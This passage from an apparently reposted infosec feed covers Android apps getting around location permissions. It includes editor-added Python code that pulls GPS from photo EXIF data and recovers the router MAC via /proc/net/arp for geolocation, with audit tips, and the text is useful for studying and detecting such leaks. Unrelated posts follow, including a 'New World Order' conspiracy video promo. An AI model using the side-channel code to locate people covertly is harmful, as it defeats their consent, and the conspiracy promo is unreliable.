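    ifd0 = struct.pack(e + "H", 1) + struct.pack(e + "HHII", 0x8825, 4, 1, 26) + struct.pack(e + "I", 0)
    gps = struct.pack(e + "H", 4)
    gps += struct.pack(e + "HHI", 1, 2, 2) + (b"N" if lat >= 0 else b"S") + b"\x00" * 3
    gps += struct.pack(e + "HHII", 2, 5, 3, 80)
    gps += struct.pack(e + "HHI", 3, 2, 2) + (b"E" if lon >= 0 else b"W") + b"\x00" * 3
    gps += struct.pack(e + "HHII", 4, 5, 3, 104)
    gps += struct.pack(e + "I", 0)
    tiff = hdr + ifd0 + gps + rat3(lat) + rat3(lon)
    app1 = b"Exif\x00\x00" + tiff
    return b"\xff\xd8\xff\xe1" + struct.pack(">H", len(app1) + 2) + app1 + b"\xff\xd9"


if __name__ == "__main__":
    print(exif_gps(build_geotagged_jpeg(40.5, -3.75)))   # made-up coordinates
```

Point the reader at real files by calling `exif_gps(open(path, "rb").read())` over a photo directory. On Android 10 and later the system redacts location metadata from images read through the shared media store unless the app also holds `ACCESS_MEDIA_LOCATION`, which closes this particular channel for apps that go through the sanctioned APIs; the study concerned the versions before that.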
It is also possible to obtain geolocation through the Wi-Fi access point, using the router's MAC address, an identifier assigned by the manufacturer that can be correlated with existing databases to work out the user's position "with fairly precise resolution".
For an app to access this information there is a permission the user has to enable on the smartphone, called "Wi-Fi connection information", Vallina explains. But some apps manage to obtain this data without that permission being enabled. To do so, they extract the router's MAC address that the device obtains via ARP (Address Resolution Protocol), the protocol used to connect to and discover the devices on a local network. In other words, apps can read a file that exposes the MAC address of the Wi-Fi access point: "If you read that file, which the operating system exposes without any permission at all, you can learn the geolocation in a way that is completely opaque to the user."
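The file in question is `/proc/net/arp`. The following added example (the editor's, not the study's or any app's code) shows how little an app needs: it reads the default gateway from `/proc/net/route`, looks that address up in the ARP table and returns the access point's MAC, the value a Wi-Fi geolocation database is keyed on. Both inputs are constructed samples in the kernel's text format; no network access is involved.

```python
def default_gateway(route_text):
    """Parse /proc/net/route; return the IPv4 default gateway as a dotted quad, or None."""
    for line in route_text.splitlines()[1:]:          # skip the header row
        fields = line.split()
        if len(fields) < 4:
            continue
        dest, gw, flags = fields[1], fields[2], int(fields[3], 16)
        # Destination 00000000 with RTF_GATEWAY (0x2) set is the default route.
        if dest == "00000000" and flags & 0x2:
            v = int(gw, 16)                           # hex of the address in host (little-endian) order
            return ".".join(str((v >> (8 * i)) & 0xFF) for i in range(4))
    return None


def arp_mac(arp_text, ip):
    """Return the MAC for ip from /proc/net/arp if the entry is complete (ATF_COM, 0x2)."""
    for line in arp_text.splitlines()[1:]:
        fields = line.split()
        if len(fields) >= 4 and fields[0] == ip and int(fields[2], 16) & 0x2:
            return fields[3].lower()
    return None


def access_point_bssid(route_text, arp_text):
    """The side channel end to end: default gateway -> ARP entry -> access point MAC."""
    gw = default_gateway(route_text)
    return arp_mac(arp_text, gw) if gw else None


def oui(mac):
    """Manufacturer prefix (first three octets); on its own it narrows the router model,
    the full MAC is what geolocation databases index."""
    return mac[:8].upper()


# Constructed samples in the format of /proc/net/route and /proc/net/arp (made-up addresses).
SAMPLE_ROUTE = """Iface\tDestination\tGateway \tFlags\tRefCnt\tUse\tMetric\tMask\t\tMTU\tWindow\tIRTT
wlan0\t00000000\t0101A8C0\t0003\t0\t0\t0\t00000000\t0\t0\t0
wlan0\t0001A8C0\t00000000\t0001\t0\t0\t0\t00FFFFFF\t0\t0\t0
"""
SAMPLE_ARP = """IP address       HW type     Flags       HW address            Mask     Device
192.168.1.1      0x1         0x2         A4:2B:8C:11:22:33     *        wlan0
192.168.1.37     0x1         0x0         00:00:00:00:00:00     *        wlan0
"""

if __name__ == "__main__":
    # On a pre-Android-10 device an app would read the two real files here instead.
    print(access_point_bssid(SAMPLE_ROUTE, SAMPLE_ARP))
```

Android 10 restricted app access to `/proc/net`, which is the change the article says Google pointed to. When auditing an app for this behaviour, look for reads of `/proc/net/arp` or `/proc/net/route` in its Java and native code, or hook `open()` in a dynamic run; neither path appears in any permission prompt.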
Third-party libraries
Many of these data leaks and privacy abuses are carried out by libraries, third-party services or mini-programs bundled into an app's code. These libraries run with the same privileges as the app that contains them. Often the user is not even aware that they exist. "Many of these services have a business model based on obtaining and processing personal data," the researcher says.
For example, apps such as the Hong Kong Disneyland app use the mapping service of the Chinese company Baidu. Through it they can access, without needing any permission, information such as the IMEI and other identifiers that the Chinese search company's libraries store on the SD card. Samsung's health and navigation apps, installed on more than 500 million devices, have also relied on these libraries. "The library itself exploits these vulnerabilities to access that data for its own purposes. It is not clear whether the app developer then accesses that data through the library," he explains.
Vallina says that future research will analyse the ecosystem of third-party libraries and the purposes for which data is collected. They will also study the monetisation models that exist on Android and how transparent apps are about what they do versus what their privacy policies say they do. To prevent such practices, study co-author Joel Reardon stresses the importance of research of this kind in order to "find these bugs and prevent them".
If app developers can circumvent permissions, does it make sense to ask users for permission at all? "Yes," Reardon replies flatly. The researcher stresses that apps cannot bypass every control mechanism and that it will gradually get harder for them. "The permission system has many flaws, but it still works and serves an important purpose," he says.
Developers' responsibility
These practices, carried out without users' consent, breach, among other regulations, the General Data Protection Regulation (GDPR) and Spain's Organic Law on Data Protection. Under the GDPR, the developers of these apps could face fines of up to 20 million euros or 4% of the company's annual turnover. They could even constitute an offence against privacy (Article 197 of the Spanish Criminal Code) carrying prison sentences, according to Adsuara.
The lawyer argues that most of the responsibility lies with the developers. But he believes that both the stores (Google Play and Apple's App Store) and the platforms that give apps access to their users' data (such as Facebook in the Cambridge Analytica case) have a duty of oversight (responsabilidad in vigilando): "that is, the duty to check that the apps they accept into their store, or to which they give access to their users' data on their platform, are secure".
"Although everyone is responsible for their own actions, what is missing is a Spanish or European authority that reviews the security of ICT applications and services before they are launched on the market," he says. He stresses that in other sectors there is some form of certification guaranteeing that a product or service is safe: "Nobody would think of authorising cars with failing brakes to be driven, let alone medicines, food or toys. Yet in the ICT sector it is normal for applications and services to be launched with security holes that are then patched as they go along."
https://elpais.com/tecnologia/2019/07/18/actualidad/1563452146_195128.html
#faceapp #privacidad
Gaslight – Film, Literature and the New World Order
In this edition of Film, Literature and the #NewWorldOrder we welcome Thomas Sheridan, author of The Anvil of the Psyche, to discuss Gaslight, the 1940 British psychological thriller that introduced us to the concept of ‘gaslighting.’ In the discussion we point out how common #gaslighting is, ask “Are you being gaslighted?”, talk about techniques for defending oneself from gaslighting, and talk about how this technique is used on a societal level by the psychopaths at the top of the pyramid.
📺 https://www.corbettreport.com/gaslight-film-literature-and-the-new-world-order/
#corbettreport #video #podcast
On TikTok, Teens Meme the Safety App Ruining Their Summer
Spend enough time on the social media app TikTok, and you’re bound to see a Life360 meme. That’s because Life360, a location-sharing app aimed at families, is apparently ruining the lives of teenagers all across the United States. The service allows parents to track their kids’ whereabouts in real time, among other features. As one girl with long, blond hair jokes in a popular TikTok clip, it’s set her summer vacation on fire. Some of the videos have racked up hundreds of thousands of likes—in other words, they’re relatable.
That’s because for many adolescents, adult supervision has turned into adult surveillance. Schools are adopting facial recognition technology to monitor campuses. Parents can now remotely check their child’s browsing histories and social media accounts, watch their movements via motion-sensing cameras, and track everywhere they go with location-sharing apps. In a Pew Research Center study last year, 58 percent of US parents said they sometimes or often look at their teenager’s messages, call logs, and the websites they visit. In a separate study from 2016, 16 percent said they used location-sharing apps.
Life360 is one of the many digital monitoring tools now used by millions of parents in the United States. The app functions like an enhanced version of Apple’s “Find My” feature that lets you share your location with friends or family—or what the company calls “your Circle.” In addition to location sharing, Life360 lets family members see how fast people in their circle are driving, how much battery their cell phones have, and more. The service is free to download and use, although you can pay for additional features. According to the San Francisco-based company, Life360 had over 18 million monthly active users at the end of 2018.
👉🏼 Read the full story without ads n shit:
https://rwtxt.lelux.fi/blackbox/on-tiktok-teens-meme-the-safety-app-ruining-their-summer
#Life360 #surveillance #teens #USA
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN